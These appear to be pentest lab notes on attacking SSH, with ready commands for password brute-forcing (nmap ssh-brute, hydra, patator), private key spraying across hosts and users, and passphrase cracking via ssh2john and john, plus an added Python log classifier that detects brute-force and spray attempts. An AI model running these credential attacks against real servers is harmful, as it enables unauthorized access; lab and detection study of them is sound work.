SSH - 22

NMAP

ls /usr/share/nmap/scripts/ | grep -i ssh

nmap --script ssh-brute --script-args userdb=/root/HTB/hosts/shocker/user.lst,passdb=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt,brute.emptypass=True -d -v -sV -p 2222 10.10.10.56

Hydra

hydra -l rabakuku -P INSERTWORDLIST 192.168.1.1 ssh

SSH combo list

patator ssh_login host=FILE0 user=COMBO10 password=COMBO11 0=./ssh-open.nmap 1=./combo-creds.txt

Single user many passwords

patator ssh_login host=10.10.10.56 port=2222 --timeout 30 --threads=20 user=root password=FILE0 0=/root/oscp/lab-net2019/passwords.txt -x ignore:mesg='Authentication failed.'

SSH Private Key Spray

patator ssh_login keyfile=rsakey.cfg host=FILE0 user=bob 0=/root/oscp/lab-net2019/ssh-open.nmap --max-retries 1 --timeout 10

# Spray one keyfile against a single host, trying many users
patator ssh_login keyfile=./f1fb2162a02f0f7c40c210e6167f05ca-16858 host=10.31.1.133 user=FILE0 0=./users.lst --max-retries 3 --timeout 100
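
What the runs above look like from the target's sshd log, as an added example (not part of the original notes): it separates "single user, many passwords" from a spray across many users. The log lines are constructed samples and the thresholds are assumed values.

```python
import re
from collections import defaultdict

# Constructed sample sshd auth log lines (not taken from the original page).
SAMPLE_LOG = """\
Jan 10 10:00:01 box sshd[911]: Failed password for root from 10.0.0.5 port 40001 ssh2
Jan 10 10:00:02 box sshd[912]: Failed password for root from 10.0.0.5 port 40002 ssh2
Jan 10 10:00:03 box sshd[913]: Failed password for root from 10.0.0.5 port 40003 ssh2
Jan 10 10:00:04 box sshd[914]: Failed publickey for bob from 10.0.0.7 port 40100 ssh2: RSA SHA256:AAAAconstructed
Jan 10 10:00:05 box sshd[915]: Failed publickey for alice from 10.0.0.7 port 40101 ssh2: RSA SHA256:AAAAconstructed
Jan 10 10:00:06 box sshd[916]: Failed password for invalid user carol from 10.0.0.7 port 40102 ssh2
Jan 10 10:00:07 box sshd[917]: Failed password for dave from 10.0.0.9 port 40200 ssh2
Jan 10 10:00:08 box sshd[918]: Accepted password for dave from 10.0.0.9 port 40201 ssh2
"""

# Matches OpenSSH failure lines for both password and public-key auth.
FAILED = re.compile(
    r"sshd\[\d+\]: Failed (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def classify(log_text, guess_threshold=3, spray_threshold=3):
    """Return {source_ip: label} for sources that look like guessing or spraying.

    Thresholds are assumed values; tune them to the environment.
    """
    attempts = defaultdict(lambda: defaultdict(int))  # ip -> user -> failures
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            attempts[m["ip"]][m["user"]] += 1

    findings = {}
    for ip, per_user in attempts.items():
        if len(per_user) >= spray_threshold:
            findings[ip] = "spray"        # one source, many distinct users
        elif max(per_user.values()) >= guess_threshold:
            findings[ip] = "brute-force"  # one source, many guesses at one user
    return findings

if __name__ == "__main__":
    for ip, label in sorted(classify(SAMPLE_LOG).items()):
        print(ip, label)
```

Depending on the sshd LogLevel, failed publickey attempts for valid users may only be recorded at VERBOSE, so a key spray can be invisible at the default level.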

Find SSH Keyphrase with John - Crack SSH Private Key

First, convert the SSH private key into a hash that John can read, using ssh2john:

python ssh2john.py SecretKey > SecretKey.hash
# Then pass the hash to john
sudo john SecretKey.hash --wordlist=INSERTWORDLIST!
